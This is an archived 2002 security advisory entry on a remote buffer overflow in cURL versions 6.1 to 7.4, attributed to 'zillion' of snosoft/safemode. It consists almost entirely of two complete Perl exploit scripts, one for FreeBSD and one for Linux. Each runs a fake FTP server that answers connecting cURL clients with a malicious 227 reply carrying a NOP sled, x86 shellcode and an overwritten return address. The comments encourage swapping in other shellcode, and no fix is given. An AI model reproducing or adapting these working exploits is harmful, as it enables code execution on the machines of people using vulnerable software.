7th May 2002 [SBWID-5332]
COMMAND
cURL remote buffer overflow exploits
SYSTEMS AFFECTED
cURL v 6.1 - 7.4
PROBLEM
\'KF\' [http://www.snosoft.com/research/] posted :
--FreeBSD Exploit --
--------------010208070202030806020806
Content-Type: text/plain;
name=\"cURL-remote-FBSD.pl\"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename=\"cURL-remote-FBSD.pl\"
#!/usr/bin/perl
#
# Remote FreeBSD cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com)
#
# This exploit may only be used for testing purposes. More information
# about the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write \"Ha! Owned by a cURL!\" to stdout on the system
# running cURL. The extra nops are needed because the buffer, which causes
# the overflow, is altered.
#
# $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/
# Ha! Owned by a cURL!
use IO::Socket;
use Net::hostent;
########################################################################
$shellcode =
\"\\xeb\\x14\\x5e\\x31\\xc0\\x6a\\x14\\x56\\x40\\x40\\x50\\xb0\\x04\\x50\\xcd\".
\"\\x80\\x31\\xc0\\x40\\x50\\xcd\\x80\\xe8\\xe7\\xff\\xff\\xff\\x48\\x61\\x21\".
\"\\x20\\x4f\\x77\\x6e\\x65\\x64\\x20\\x62\\x79\\x20\\x61\\x20\\x63\\x55\\x52\".
\"\\x4c\\x21\\x23\".
\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\";
while($_ = $ARGV[0], /^-/) {
shift;
last if /^--$/;
/^-p/ && do { $port = shift; };
/^-l/ && do { $list = 1; };
/^-o/ && do { $offset = shift; };
}
$id = `id -u`; chop($id);
$size = 225;
$esp = 0xbfbffbd4;
$offset = -140 unless $offset;
$port = 21 unless $port;
if(!$list || $port > 1024 && $id != 0) {
print <<\"TWENTE\";
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+
Usage : $0 -l
Option: $0 -p <port to listen on>
Option: $0 -o <offset>
Note: low ports require root privileges
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+
TWENTE
exit;
}
for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {
$buffer .= \"\\x90\";
}
$buffer .= $shellcode;
$buffer .= pack(\'l\', ($esp + $offset));
print(\"We are using return address: 0x\", sprintf(\'%lx\',($esp - $offset)), \"\\n\");
print \"Starting to listen for incomming connections on port $port\\n\";
my $sock = new IO::Socket::INET (
LocalPort => $port,
Proto => \'tcp\',
Listen => 1,
Reuse => 1,
);
die \"Could not create socket: $!\\n\" unless $sock;
while($cl = $sock->accept()) {
$hostinfo = gethostbyaddr($cl->peeraddr);
printf \"[Received connect from %s]\\n\", $cl->peerhost;
print $cl \"220 Safemode.org FTP server (Version 666) ready.\\n\";
print $cl \"230 Ok\\n\";
print $cl \"227 $buffer\\n\";
sleep 2;
}
--------------010208070202030806020806--
--Linux Exploit --
--------------030109090800050503000809
Content-Type: text/plain;
name=\"cURL-remote-LNX.pl\"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename=\"cURL-remote-LNX.pl\"
#!/usr/bin/perl
#
# Remote linux cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://safemode.org && http://www.snosoft.com)
#
# This exploit, which has been tested to work with cURL 6.4, 7.2 and 7.3,
# may only be used for testing purposes. Additionally, the author does not
# take any resposibilities for abuse of this file. More information about
# the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write \"Owned by a cURL ;)\" to the file /tmp/0wned.txt
# You can replace it with whatever you want but be warned: due to buffer
# manipilation working shellcode might be altered.
#
# A FreeBSD version is also available on safemode.org
use IO::Socket;
use Net::hostent;
$shellcode = # does a open() write() close() and exit().
\"\\xeb\\x40\\x5e\\x31\\xc0\\x88\\x46\\x0e\\xc6\\x46\\x21\\x09\\xfe\\x46\\x21\".
\"\\x88\\x46\\x22\\x8d\\x5e\\x0f\\x89\\x5e\\x23\\xb0\\x05\\x8d\\x1e\\x66\\xb9\".
\"\\x42\\x04\\x66\\xba\\xe4\\x01\\xcd\\x80\\x89\\xc3\\xb0\\x04\\x8b\\x4e\\x23\".
\"\\x66\\xba\\x0f\\x27\\x66\\x81\\xea\\xfc\\x26\\xcd\\x80\\xb0\\x06\\xcd\\x80\".
\"\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xbb\\xff\\xff\\xff\\x2f\\x74\\x6d\\x70\".
\"\\x2f\\x30\\x77\\x6e\\x65\\x64\\x2e\\x74\\x78\\x74\\x23\\x30\\x77\\x6e\\x65\".
\"\\x64\\x20\\x62\\x79\\x20\\x61\\x20\\x63\\x55\\x52\\x4c\\x20\\x3b\\x29\";
while($_ = $ARGV[0], /^-/) {
shift;
last if /^--$/;
/^-p/ && do { $port = shift; };
/^-l/ && do { $list = 1; };
/^-o/ && do { $offset = shift; };
}
$id = `id -u`; chop($id);
$size = 249;
$esp = 0xbffff810;
$offset = -150 unless $offset;
$port = 21 unless $port;
if(!$list || $port > 1024 && $id != 0) {
print <<\"TWENTE\";
Usage : $0 -l
Option: $0 -p <port to listen on>
Option: $0 -o <offset>
Note: low ports require root privileges
TWENTE
exit;
}
for ($i = 0; $i < ($size - length($shellcode)) - 4; $i++) {
$buffer .= \"\\x90\";
}
$buffer .= \"$shellcode\";
$buffer .= pack(\'l\', ($esp + $offset));
print(\"Listening on port $port. We are using return address: 0x\", sprintf(\'%lx\',($esp - $offset)), \"\\n\");
my $sock = new IO::Socket::INET (
LocalPort => $port,
Proto => \'tcp\',
Listen => 1,
Reuse => 1,
);
die \"Could not create socket: $!\\n\" unless $sock;
while($cl = $sock->accept()) {
$hostinfo = gethostbyaddr($cl->peeraddr);
printf \"[Received connect from %s]\\n\", $hostinfo->name || $cl->peerhost;
print $cl \"220 Safemode.org FTP server (Version 666) ready.\\n\";
print $cl \"230 Ok\\n\";
print $cl \"227 $buffer\\n\";
sleep 2;
}
--------------030109090800050503000809--
SOLUTION
??
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
